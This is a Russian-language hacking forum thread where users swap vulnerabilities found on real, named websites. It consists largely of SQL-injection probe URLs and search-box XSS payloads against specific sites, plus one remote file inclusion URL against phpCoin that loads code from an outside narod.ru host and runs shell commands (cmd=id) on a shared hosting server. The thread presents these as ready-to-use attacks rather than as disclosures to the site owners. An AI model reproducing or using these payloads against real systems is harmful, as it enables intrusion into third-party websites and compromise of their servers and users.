Очень часто создаются темы типа: Нашел XSS, Нашёл SQL injection. Уже немного надоело. Предлагаю всем найденные вами баги (если вам не терпится показать этот баг всем) постить в эту тему, чтобы не засорять форум! UPD: никаких рефереров! все линки даем исключительно так _http://
http://www.generis.ru/?page=press_wholenews&id=' http://www.integracija.gov.lv/forum/?setc=1&forumid=' http://www.mossei.ru/?page=' Вот для начала
Идея хорошая принципы . _www.pansionmsu.ru , в строке поиска <script>alert()<script> _http://msu.ru/ , в строке поиска , <script>alert()<script> не вышел , а <marquee>msu</marquee> выходит . _http://online.ua/ Строка поиска , <marquee>UA</marquee> , <img src="http://www.online.ua/all/0.gif"> покажет свой собственный логотип который в верхнем левом углу .
_http://referat.star-info.ru В поиске если написать <i>i</i> то будет так Warning: eregi_replace(): REG_EMPTY in /usr/home/www/user/referat.star-info.ru/inc/func on line 73
www.supersait.net.ru/billing/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id сам сайт supersait.net.ru нечего из себя не представляет, зато он хостится на очень известном хостинге, до которого можно добраться используя багу в phpcoin. Тоесть благодаря php include мы можем выполнять никсовые комманды (ls;pwd;echo;cat) на сервере.
_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Ci%3Ei%3C%2Fi%3E&method=exact В графе поиск статьи <script>alert()</script>
Справочник телефонов города Орла http://www.g-play.ru/orel/ "Поиск организаций по названию, виду деятельности:" В поиске <script>alert()</script>
Еще . 1) url : _http://prohosting.fatpickle.com/search <script>alert()</script> в поиске . 2) Url: _http://www.babr.ru/index.php?pt=pages <script>alert()</script> в поиске . 3) url : _http://www.ambercity.ru/ <script>alert()</script> в поиске .
1) Url :_http://www.cityvision2000.com Можно узнать путь установки . В поиске <script>alert()</script> "D:\Webs\city\www\search.cgi": No such file or directory 2) url: _http://www.pages.ru/ Поиск <script>alert()</script>
XSS-уязвимости 1. _http://www.ruslink.de/cgi-bin/search.pl XSS1 - "<script>alert()</script>" в строчке поиска. 2. _http://links.keraben.ru/search.php XSS2 - "<script>alert()</script>" в строчке поиска. 3. _http://www.send.ru/search/index.html XSS3 - "<script>alert()</script>" в строчке поиска. 4. _http://coda.net.ru/index.php XSS4 - "<script>alert()</script>" в строчке поиска. 5. _http://www.zlinks.ru/search.php XSS5 - "<script>alert()</script>" в строчке поиска.
_http://www.flirtshop.ru/search.xhtml?sea_text=%3Cscript%3Ealert%28%22Vandal%22%29%3C%2Fscript%3E&-action.search=1
xss.. 1. _http://www.infopiter.ru/cgi-bin/catalog/catalog.cgi?action=search&fil=1&Keywords=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&poisk=word 2. _http://list.emy.ru/search.php?keyword=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=0&x=26&y=9 3. _http://www.fromatoz.ru/catalog/search/?searchQuery=%3Cscript%3Ealert%28%29%3C%2Fscript%3E 4. _http://links.vestor-ru.ru/0.html?s=%3Cscript%3Ealert%28%29%3C%2Fscript%3E 5. _http://catalog.a-les.ru/index.php?ac=search / в поиске <script>alert()</script>